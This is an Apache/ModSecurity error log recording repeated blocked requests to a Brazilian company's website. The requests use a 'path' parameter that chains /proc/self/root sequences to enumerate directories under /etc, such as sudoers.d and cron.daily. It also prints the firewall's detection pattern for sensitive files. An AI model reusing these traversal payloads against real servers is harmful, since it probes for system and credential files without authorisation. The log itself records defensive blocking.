[Mon Mar 16 16:44:49.566734 2026] [:error] [pid 29802:tid 140411683178240] [client 74.7.241.46:57408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdsc_BxrYCr4hPDw_97wAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:44:50.698808 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:57410] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdso6lpbStxTqkSkt-EwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:44:52.011954 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:57416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdtP9ocpUE4ed4uDwGIwAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:44:53.295419 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:57422] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdtf9ocpUE4ed4uDwGJAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:44:55.567914 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:57426] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdtlajLEzk2WiQ-10mtgAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:44:55.568237 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:43940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdtrABkC4fWIHEf8EGogAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:56.859735 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:57436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhduLABkC4fWIHEf8EGpQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:44:58.076890 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.241.46:42738] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdukr9dMAiw-8KANNaTAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:44:59.360780 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:42742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdu_9ocpUE4ed4uDwGJwAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:00.605504 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:42756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdvP9ocpUE4ed4uDwGKQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:02.269046 2026] [:error] [pid 14895:tid 140411733534464] [client 74.7.241.46:42768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdvlajLEzk2WiQ-10muAAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:03.439003 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.241.46:42772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdv1ajLEzk2WiQ-10mugAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:03.927071 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:45446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdv7ABkC4fWIHEf8EGrQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:45:04.851021 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:42780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdwP9ocpUE4ed4uDwGLAAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:06.163919 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:42784] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdwqQpVkWug9HeOt9I-AAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:08.363541 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.241.46:42790] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdw6QpVkWug9HeOt9I-QAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:09.666225 2026] [:error] [pid 29507:tid 140411674785536] [client 74.7.241.46:42116] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdxUr9dMAiw-8KANNaWAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:10.848030 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.241.46:42124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdxqTCbgAP5jq5TehAQwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:12.048114 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:42130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdyLysWC90G-1nBrBXdwAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:13.443108 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:42140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdyY6lpbStxTqkSkt-FgAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:14.622856 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:42142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdylajLEzk2WiQ-10mvQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
